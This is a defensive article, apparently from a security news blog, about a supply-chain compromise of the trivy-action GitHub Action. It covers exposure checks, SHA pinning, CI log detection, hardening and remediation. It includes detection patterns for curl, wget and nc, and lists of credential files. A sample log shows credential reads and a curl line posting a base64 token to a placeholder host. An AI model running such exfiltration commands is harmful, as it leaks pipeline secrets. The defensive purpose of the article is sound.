
Introduction:
A sophisticated supply-chain attack has compromised the Trivy vulnerability scanner’s GitHub Action, exploiting residual credentials from a prior breach to inject credential-stealing malware directly into CI/CD pipelines. This incident highlights the cascading risk of automated trust in development workflows, where a single compromised action can expose thousands of organizations to post-exploitation data theft.
Learning Objectives:
- Understand the mechanics of a supply-chain attack targeting CI/CD pipelines via GitHub Actions.
- Identify indicators of compromise (IOCs) associated with the malicious Trivy-action tags.
- Implement defensive strategies, including hash pinning and artifact verification, to secure automated workflows.
You Should Know:
1. The Anatomy of the Trivy-action Supply Chain Attack
The breach leveraged a previously compromised set of credentials to force-push 75 out of 76 version tags in the `aquasecurity/trivy-action` repository. By overwriting historical tags, the attacker effectively transformed trusted version references (e.g., v0.34.0) into a distribution mechanism for a credential-stealing infostealer. Because over 10,000 GitHub workflow files reference this action, any pipeline using an affected tag automatically executed the malicious payload during the scan phase.
Step‑by‑step guide to verifying your exposure:
- List your repository’s used actions: Search your `.github/workflows/*.yml` files for `aquasecurity/trivy-action`.
- Check the exact version tag: If your workflow uses `@v0.35.0`, you are safe. Any other tag from `v0.1.0` to `v0.34.1` or `v0.34.2` to `v0.34.10` (excluding `v0.35.0`) may be compromised.
- Review GitHub Actions logs for anomalies: Look for unexpected outbound network connections or processes attempting to read `~/.aws/credentials`, `~/.ssh/id_rsa`, or environment variables like `DOCKER_PASSWORD`, `GH_TOKEN`.
Linux command to audit local workflow files:
```bash
grep -rnw .github/workflows/ -e "aquasecurity/trivy-action" --color
```
- `-r` = recursive search
- `-n` = show line numbers
- `-w` = match whole words

Windows PowerShell equivalent:
```powershell
Select-String -Path .github/workflows/*.yml -Pattern "aquasecurity/trivy-action"
```
2. Mitigating Compromised GitHub Actions with Hash Pinning
The primary defense against tag poisoning is to pin actions to a specific commit hash (SHA) rather than a mutable version tag. GitHub’s documentation recommends this practice to ensure deterministic builds. By referencing the exact immutable SHA, you eliminate the risk of a tag being force-pushed to a malicious state.
Step‑by‑step guide to pinning an action:
1. Navigate to the action repository (e.g., `https://github.com/aquasecurity/trivy-action`).
2. Find the commit SHA of the last known safe version (`v0.35.0`).
3. Replace your workflow’s `uses:` line.
Example unsafe workflow:
```yaml
- name: Run Trivy vulnerability scanner
  uses: aquasecurity/[email protected]
```
Example safe workflow with hash pinning:
```yaml
- name: Run Trivy vulnerability scanner
  uses: aquasecurity/trivy-action@6f9d5682c6e693d918f7285385bae15b7de09c8c # v0.35.0
```
Automated detection script (Linux):
```bash
# Find all uses of trivy-action not pinned to a full SHA
grep -HnE "uses: aquasecurity/trivy-action@" .github/workflows/*.yml \
  | grep -vE "@[a-f0-9]{40}([[:space:]]|$)"
```
This command flags any reference that is not a full 40-character hexadecimal SHA.
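
The exposure check and the pinning audit above, generalized to every third-party action a workflow references, as an added Python example (not code from the article or from the trivy-action project). The function names, status labels and sample workflow are constructed for illustration; the tag and SHA values are the ones quoted above.

```python
import re
from pathlib import Path

# "uses: owner/repo[/path]@ref"; local (./...) and docker:// references do not match.
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?([\w.-]+/[\w./-]+)@([^\s'\"#]+)")
FULL_SHA = re.compile(r"[0-9a-f]{40}")
TRIVY_ACTION = "aquasecurity/trivy-action"
UNAFFECTED_TAG = "v0.35.0"  # the one tag the article lists as safe

def classify(action, ref):
    """Return 'pinned', 'check-exposure' or 'unpinned' for one reference."""
    if FULL_SHA.fullmatch(ref):
        return "pinned"          # immutable full commit SHA
    if action.lower() == TRIVY_ACTION and ref != UNAFFECTED_TAG:
        return "check-exposure"  # trivy-action on a tag or branch other than v0.35.0
    return "unpinned"            # any other tag, branch or short SHA

def audit_text(text, filename="<workflow>"):
    """Return (file, line, action, ref, status) for every reference that is not pinned."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = None if line.lstrip().startswith("#") else USES_RE.match(line)
        if match:
            action, ref = match.groups()
            status = classify(action, ref)
            if status != "pinned":
                findings.append((filename, lineno, action, ref, status))
    return findings

def audit_repo(root="."):
    """Audit every *.yml / *.yaml file under <root>/.github/workflows."""
    findings = []
    for path in sorted((Path(root) / ".github" / "workflows").glob("*.y*ml")):
        findings += audit_text(path.read_text(encoding="utf-8"), str(path))
    return findings

# Constructed sample workflow (not taken from a real repository).
SAMPLE = """\
steps:
  - uses: actions/checkout@v4
  - uses: aquasecurity/trivy-action@v0.34.0
  - uses: aquasecurity/trivy-action@v0.35.0
  - uses: aquasecurity/trivy-action@6f9d5682c6e693d918f7285385bae15b7de09c8c # v0.35.0
  - uses: ./.github/actions/local
"""

if __name__ == "__main__":
    for finding in audit_text(SAMPLE):
        print("%s:%d  %s@%s  [%s]" % finding)
```

Call `audit_repo(".")` from a repository root to audit its real workflow files; a non-empty result can fail a CI gate.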
3. Detecting Credential-Stealing Payloads in CI/CD Logs
The injected infostealer likely exfiltrates secrets by scraping environment variables and common credential files. Security teams should pivot from solely monitoring network egress to analyzing CI/CD runtime artifacts. The payload may attempt to `curl` or `wget` credentials to an external C2 server.
Indicators to monitor:
- Unexpected outbound connections from GitHub Actions runners to new or suspicious IPs.
- Processes reading sensitive files in `/home/runner/work` or `%USERPROFILE%`.
- Base64-encoded strings in build logs that decode to credential data.
Linux command to scan logs for exfiltration attempts:
```bash
grep -nE "curl|wget|\bnc\b|base64|export.*http|POST.*http" /path/to/github_actions.log
```
Windows command to search event logs for unusual process creation:
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Message -like "*wget*" -or $_.Message -like "*curl*"}
```
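
An added Python example (not from the article) of the log triage described above, including the step a plain `grep` cannot do: decoding base64 runs and checking whether the decoded text contains credential material. The marker patterns, indicator names and sample log lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re

NET_TOOL = re.compile(r"\b(curl|wget|nc)\b.*https?://", re.I)
CRED_PATH = re.compile(r"\.aws/credentials|\.ssh/id_rsa")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Assumed markers of credential material, chosen to match the files and
# variables the article names; extend for your own secret formats.
CRED_MARKER = re.compile(
    r"GH_TOKEN|DOCKER_PASSWORD|aws_secret_access_key|BEGIN [A-Z ]*PRIVATE KEY")

def decode_b64(token):
    """Return the decoded text, or None if token is not base64-encoded UTF-8."""
    try:
        padded = token + "=" * (-len(token) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def scan_log(lines):
    """Return (line_number, indicator) pairs for one CI log."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        if NET_TOOL.search(line):
            hits.append((lineno, "network-tool"))
        if CRED_PATH.search(line):
            hits.append((lineno, "credential-file"))
        for token in B64_RUN.findall(line):
            text = decode_b64(token)
            if text and CRED_MARKER.search(text):
                hits.append((lineno, "base64-credential"))
                break
    return hits

# Constructed log lines; the "secret" is a placeholder encoded at import time.
_LEAK = base64.b64encode(b"GH_TOKEN=constructed-not-a-real-token").decode()
_BENIGN = base64.b64encode(b"build cache key for constructed sample").decode()
SAMPLE_LOG = [
    "Run aquasecurity/trivy-action@v0.34.0",
    "cache-key: " + _BENIGN,
    "+ cat /home/runner/.aws/credentials",
    "+ curl -s https://collector.example.invalid/u -d " + _LEAK,
]

if __name__ == "__main__":
    for lineno, indicator in scan_log(SAMPLE_LOG):
        print(lineno, indicator, SAMPLE_LOG[lineno - 1][:60])
```

Hits are triage leads rather than verdicts: a legitimate download step will also raise `network-tool`, so review each flagged line against what the job is expected to do.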
4. Hardening CI/CD Pipelines Against Future Attacks
Beyond pinning, adopt a multi-layered defense strategy for GitHub Actions. Restrict permissions using the `permissions` block to ensure the workflow only has the minimum necessary rights. Additionally, use environment protection rules and require approval for workflows that access production secrets.
Example workflow with least privilege:
```yaml
name: Secure CI/CD
on: [push]
permissions:
  contents: read  # Only read repo contents, not write
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - name: Run Trivy scanner
        uses: aquasecurity/trivy-action@6f9d5682c6e693d918f7285385bae15b7de09c8c
        with:
          scan-type: 'fs'
          scan-ref: '.'
```
Key hardening steps:
- Rotate compromised credentials: Assume any secret exposed to a compromised workflow is leaked.
- Enable GitHub’s security alerts for vulnerable actions.
- Use OpenID Connect (OIDC) instead of long-lived secrets for cloud provider access.
5. Remediating After a Supply Chain Compromise
If your pipeline used an affected tag, treat the pipeline as compromised. Any artifacts, containers, or code built during that period should be considered potentially backdoored. Rebuild from a known-good state and rotate all secrets.
Step‑by‑step remediation:
1. Isolate the compromised runner logs and artifacts.
2. Rotate all secrets that were present in the environment (AWS keys, GitHub tokens, API keys).
3. Rebuild all artifacts using a clean pipeline with the safe `v0.35.0` or pinned hash.
4. Conduct a forensic review of deployment logs to identify if the payload exfiltrated data.
5. Notify stakeholders if sensitive data may have been exposed.
What Undercode Say:
- Key Takeaway 1: Tag-based versioning in CI/CD is inherently unsafe; mandatory SHA pinning is the only reliable control against tag poisoning attacks.
- Key Takeaway 2: The Trivy incident underscores the “blast radius” of supply-chain attacks—a single compromised action can cascade across tens of thousands of organizations, turning trusted developer tools into primary attack vectors. Continuous monitoring of CI/CD logs and behavioral anomalies is no longer optional but essential for post-exploitation detection.
Prediction:
Expect a sharp rise in similar supply-chain attacks targeting popular GitHub Actions and container tools in the coming year. Attackers will increasingly automate the discovery of mutable tags across high-usage repositories, leveraging residual credentials from previous breaches to maintain persistence. Organizations will be forced to adopt software bill of materials (SBOM) for pipelines and enforce strict runtime policies that block actions not pinned by SHA, effectively ending the era of trust-based version tags in CI/CD.
Reported By: Varshu25 Trivy – Hackers Feeds


